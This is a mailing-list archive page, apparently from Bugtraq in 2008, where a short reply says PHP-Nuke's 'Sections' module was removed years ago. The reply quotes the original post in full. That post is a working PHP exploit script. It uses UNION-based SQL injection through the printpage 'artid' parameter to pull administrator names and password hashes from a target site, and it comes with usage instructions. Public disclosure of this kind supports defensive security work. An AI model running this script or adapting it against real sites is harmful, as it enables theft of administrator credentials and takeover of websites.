[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: php-nuke 8.0 module sections artid blind sql inj vuln.



The 'Sections' module was removed from phpNuke years ago, probably
around version 7.4 (2006) and was replaced by the 'Content' module.

John Haywood


-----Original Message-----
From: the.dumenci@xxxxxxxxx
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: php-nuke 8.0 module sections artid blind sql inj vuln.
Date: 30 Dec 2008 14:31:59 -0000

<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);
echo '
+=========================================================+
|PHP-NUKE Module Sections printpage artid Sql inj Vuln.
|&#304;MHAT&#304;M&#304;.ORG BugBUSTER Team. |
+=========================================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* Ac&#305;klama */
if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin.
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query 
="modules.php?name=Sections&op=printpage&artid=99999+union+select+aid,pwd+from+".$prefix."_authors";
$version = 6;
break;
default:
$query 
="modules.php?name=Sections&op=printpage&artid=99999'+union+select+aid,pwd+from+".$prefix."_authors";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Hashs.: ".$matches[0];
if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print 
"\nAdmin's name: " .$match[0];}
else {echo "Basar&#305;s&#305;z(Exploit Failed)...";}

credits();


function credits(){
print "\n\n+========================================+\n\r Coded By dumenci \n\r 
Copyright (c) BugBUSTERs";
print "\n\r+========================================+\n";
exit;
}

?>